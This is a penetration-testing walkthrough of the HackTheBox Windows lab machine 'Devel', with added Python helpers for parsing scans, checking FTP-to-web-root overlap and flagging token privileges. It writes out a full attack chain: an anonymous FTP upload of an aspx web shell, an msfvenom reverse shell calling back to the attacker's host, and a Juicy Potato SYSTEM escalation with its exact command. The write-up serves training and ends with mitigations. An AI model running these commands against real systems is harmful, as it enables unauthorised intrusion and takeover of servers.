Another OSCP-like Box: Devel

@ro0taddict
6 min read, Feb 4, 2021

Devel is a Windows machine rated as an easy box on HackTheBox. Its IP is 10.10.10.5.

Enumeration

Nmap

I always use Nmap to start my enumeration.

sudo nmap -sC -sV -Pn -oA default-script 10.10.10.5

  • -sC, runs the default NSE script set against open ports
  • -sV, probes open ports for service and version information
  • -Pn, skips host discovery (no ping first) and treats the host as up
  • -oA, writes the results in all three formats (normal, greppable and XML) using default-script as the base filename

Nmap Automator

For OSCP practice, I ran a tool called Nmap Automator to run the enumeration steps in parallel. This tool can be downloaded from this link. In a real-world engagement I would be mindful of the amount of traffic this tool generates; I don't want to cause an unnecessary denial of service.

nmapautomator 10.10.10.5 All

The Nmap result showed that TCP ports 21 and 80 are open.
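The .gnmap file that -oA produces is the one worth parsing when you want to feed the open ports into a follow-up scan or another tool. The following is an added example, not code from the original post; the sample scan output inside it is constructed to resemble what this box returns (the post only showed a screenshot).

```python
from dataclasses import dataclass

# Constructed sample of the .gnmap file that "-oA default-script" writes for
# this box: two open TCP ports, everything else filtered. Not taken from the
# original post, whose scan output was shown as a screenshot.
SAMPLE_GNMAP = (
    "# Nmap 7.91 scan initiated as: nmap -sC -sV -Pn -oA default-script 10.10.10.5\n"
    "Host: 10.10.10.5 ()\tStatus: Up\n"
    "Host: 10.10.10.5 ()\tPorts: 21/open/tcp//ftp//Microsoft ftpd/, "
    "80/open/tcp//http//Microsoft IIS httpd 7.5/\tIgnored State: filtered (998)\n"
    "# Nmap done -- 1 IP address (1 host up) scanned\n"
)


@dataclass(frozen=True)
class OpenPort:
    port: int
    proto: str
    service: str
    version: str


def parse_gnmap(text: str) -> dict:
    """Return {host: [OpenPort, ...]} for every port reported as open.

    Grepable output is tab-separated; the "Ports:" field holds comma-separated
    entries of the form port/state/proto/owner/service/rpcinfo/version/.
    """
    found: dict = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        fields = line.split("\t")
        host = fields[0].split()[1]
        ports_field = next(f for f in fields if f.startswith("Ports:"))[len("Ports:"):]
        for entry in ports_field.split(","):
            parts = entry.strip().split("/")
            if len(parts) < 7:
                continue  # malformed entry; skip it rather than abort the whole file
            port, state, proto, _owner, service, _rpc, version = parts[:7]
            if state != "open":
                continue  # closed/filtered ports are noise for the next step
            # Nmap writes "|" in place of "/" inside grepable version strings.
            found.setdefault(host, []).append(
                OpenPort(int(port), proto, service, version.replace("|", "/"))
            )
    return found


def port_list(found: dict, host: str, proto: str = "tcp") -> str:
    """Comma-separated open ports, ready for a targeted "nmap -p" on that host."""
    return ",".join(str(p.port) for p in found.get(host, []) if p.proto == proto)


if __name__ == "__main__":
    scan = parse_gnmap(SAMPLE_GNMAP)
    for host, ports in scan.items():
        for p in ports:
            print(f"{host} {p.port}/{p.proto} {p.service} {p.version}")
        print(f"follow-up: nmap -sC -sV -p {port_list(scan, host)} {host}")
```

Point it at the real file with `parse_gnmap(open("default-script.gnmap").read())`; the parser keeps only open ports, so the result for this box is exactly the 21 and 80 mentioned above.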

Port 21

The FTP banner gave no version information, so I could not look for a vulnerability or exploit specific to this service. Anonymous login was allowed, however, and file uploads to the directory were not restricted.

ftp 10.10.10.5

I logged in as user anonymous with an arbitrary password.

In a separate terminal, I created a file named test.txt.

I then uploaded the file with the FTP put command.

Port 80

The web server is IIS 7.5 and looked like a default installation. I downloaded the image on the page and saw that it was named welcome.png, the same file listed in the FTP directory. That is a strong hint that the FTP root and the web root are the same directory.

I then requested test.txt in a browser and could view it, confirming that whatever I upload over FTP is served by IIS.

My next step was to look for asp or aspx web shells on Kali. Web shells are malicious scripts used by attackers and penetration testers to gain some form of code execution on the target server. IIS executes asp and aspx files.

I tried both asp and aspx web shells and I had great success with aspx files.

locate '*.aspx'

cp /usr/share/webshells/aspx/cmdasp.aspx .

Using FTP, I then uploaded cmdasp.aspx web shell to the IIS server.

put cmdasp.aspx

I then browsed to the web shell and tested command execution.

http://10.10.10.5/cmdasp.aspx

whoami&&hostname

Reverse Shell

I wanted a proper reverse shell, so I generated a binary with msfvenom, the Metasploit Framework tool that generates stand-alone payloads.

msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.16 lport=4444 -f exe -o shell.exe

  • -p selects the payload. windows/shell_reverse_tcp is a stageless payload, so a plain Netcat listener can catch it; the windows/ prefix (as opposed to windows/x64/) makes it 32-bit, which runs on both 32-bit and 64-bit Windows.
  • lhost is the IP of my Kali machine
  • lport is my listening port; I used port 4444
  • -f selects the output format, here a Windows executable
  • -o sets the output filename; I named the binary shell.exe

I connected again to the FTP server, changed the mode to binary and uploaded shell.exe.

binary

put shell.exe

The IIS default web root is C:\inetpub\wwwroot. I listed that directory through the web shell and found the shell.exe binary there.

dir C:\inetpub\wwwroot

I then started a Netcat listener on port 4444 on Kali.

Next, I executed shell.exe through the web shell to get a reverse shell.

C:\inetpub\wwwroot\shell.exe
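The whole chain above rests on two facts: anonymous FTP accepts uploads, and the FTP root is the IIS web root. Below is an added example, not code from the original post, that checks both in one go: it uploads a randomly named marker over FTP in binary mode (the ftplib equivalent of typing binary and then put, which is also how shell.exe was pushed above) and then reads the marker back over HTTP. The target host 10.10.10.5 is taken from the post; the check logic is written against injected upload/fetch callables so it can be exercised without a network.

```python
import ftplib
import io
import secrets
import urllib.error
import urllib.request

TARGET = "10.10.10.5"  # the box from the post; any host with anonymous FTP plus HTTP works


def anonymous_upload(host: str, name: str, data: bytes, timeout: int = 10) -> None:
    """Anonymous login followed by a binary-mode STOR (same as "binary" then "put").

    ftplib raises ftplib.error_perm if the directory is not writable, so a
    hardened server fails loudly here instead of silently storing nothing.
    """
    with ftplib.FTP(host, timeout=timeout) as ftp:
        ftp.login()  # no arguments: user "anonymous", password "anonymous@"
        ftp.storbinary(f"STOR {name}", io.BytesIO(data))


def fetch_over_http(host: str, name: str, timeout: int = 10):
    """GET http://host/name. Returns the body, or None when the server says 404."""
    try:
        with urllib.request.urlopen(f"http://{host}/{name}", timeout=timeout) as resp:
            return resp.read()
    except urllib.error.HTTPError as exc:
        if exc.code == 404:
            return None  # upload worked, but the web root is a different directory
        raise


def roots_overlap(upload, fetch) -> tuple:
    """Upload a random marker via `upload`, read it back via `fetch`.

    Returns (overlap, marker_name). The random name avoids clobbering anything
    already on the server and tells you what to delete afterwards.
    """
    name = f"chk-{secrets.token_hex(4)}.txt"
    body = secrets.token_hex(16).encode()
    upload(name, body)
    got = fetch(name)
    return (got is not None and got.strip() == body, name)


if __name__ == "__main__":
    overlap, marker = roots_overlap(
        lambda n, d: anonymous_upload(TARGET, n, d),
        lambda n: fetch_over_http(TARGET, n),
    )
    print(f"FTP root is the web root: {overlap} (marker file: {marker})")
```

If the marker comes back over HTTP, anything you can upload you can also have IIS serve, and for .aspx files, execute; the same anonymous_upload call with the contents of shell.exe is the binary-mode upload from the step above.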

Privilege Escalation

Back on the target, I started enumerating manually. I ran systeminfo to get basic information about the host.

Since this is an old Windows operating system, I checked whether the host is vulnerable to a token impersonation attack. A good explanation of this technique is found here.

whoami /priv

The output showed that SeImpersonatePrivilege is enabled for this shell, which means the target is likely vulnerable to a token impersonation attack. SeImpersonatePrivilege is normally granted to service accounts (IIS application pool identities among them) but not to regular user accounts.
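Checking whoami /priv by eye is fine on one box; on an engagement you want the same check applied to every shell you land. The following is an added example, not code from the original post: it parses whoami /priv output and flags the privileges that matter for token impersonation, plus a few other privileges with well-known escalation paths. The sample output is constructed to look like what a service identity such as an IIS application pool account typically shows (the post showed its output as a screenshot).

```python
import re

# Constructed sample of "whoami /priv" output for a low-privileged service
# identity such as an IIS application pool account. Not copied from the post.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Holding either of these lets a process that coaxes a SYSTEM service into
# authenticating to it (the Potato technique) run code with that token.
IMPERSONATION_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}
# Other privileges with well-known escalation paths, worth flagging if held.
OTHER_DANGEROUS_PRIVS = {
    "SeDebugPrivilege", "SeBackupPrivilege", "SeRestorePrivilege",
    "SeTakeOwnershipPrivilege", "SeLoadDriverPrivilege",
}

_PRIV_LINE = re.compile(r"^(Se\w+?Privilege)\s+(.*?)\s+(Enabled|Disabled)$")


def parse_whoami_priv(text: str) -> dict:
    """Map privilege name -> state ("Enabled"/"Disabled") from whoami /priv output."""
    privs = {}
    for raw in text.splitlines():
        m = _PRIV_LINE.match(raw.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def assess(privs: dict) -> dict:
    """Which held privileges matter for escalation.

    A "Disabled" privilege is still held by the token; the process can switch it
    on with AdjustTokenPrivileges. Only privileges absent from the list are out
    of reach, so both states are reported here.
    """
    held = set(privs)
    return {
        "impersonation": sorted(held & IMPERSONATION_PRIVS),
        "other": sorted(held & OTHER_DANGEROUS_PRIVS),
    }


if __name__ == "__main__":
    result = assess(parse_whoami_priv(SAMPLE_WHOAMI_PRIV))
    if result["impersonation"]:
        print("Token impersonation candidate:", ", ".join(result["impersonation"]))
    if result["other"]:
        print("Other abusable privileges:", ", ".join(result["other"]))
    if not (result["impersonation"] or result["other"]):
        print("No obviously abusable privileges held")
```

Paste the real whoami /priv output into parse_whoami_priv; a non-empty "impersonation" list is the cue to reach for a Potato-family tool, which is the path taken next on this box.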

I then downloaded the exploit binary from this link.

cp ~/Downloads/Juicy.Potato.x86.exe .

I connected again using FTP, ran in binary mode and uploaded the Juicy.Potato.x86.exe exploit.

binary

put Juicy.Potato.x86.exe

In the reverse shell, I changed my directory to C:\inetpub\wwwroot,

cd C:\inetpub\wwwroot\

In another terminal, I started a second Netcat listener on port 4444 to catch the SYSTEM shell.

Finally, I executed the following command to escalate my privilege:

Juicy.Potato.x86.exe -l 4444 -p "C:\inetpub\wwwroot\shell.exe" -t * -c {F087771F-D74F-4C1A-BB8A-E16ACA9124EA}

Here -l is the port on which the exploit's local COM server listens (on the target), -p the program to run with the captured token, -t * tries both CreateProcessWithTokenW and CreateProcessAsUser, and -c the CLSID of the COM server that gets triggered. Note that -l 4444 is a local port on the target and is unrelated to the Netcat listener on Kali, even though both happen to be 4444 here. Please refer to this link for the full explanation of the syntax.

If the command above does not work, try another CLSID from this link. A CLSID (class identifier) is a GUID that uniquely identifies a COM class registered on a Windows system; which CLSIDs run as SYSTEM and are usable for this attack varies by Windows version.

Flags

Lessons Learned

  • When a target gives us a way to upload files, look for a different way to execute them. On this box we uploaded our files over FTP and executed them through the web server.
  • Don't forget to switch to binary mode in FTP when transferring a binary.
  • It is not best practice to allow anonymous FTP login, let alone to expose the IIS web root through it.
  • Follow the mitigations against token impersonation attacks; start with this link from MITRE.
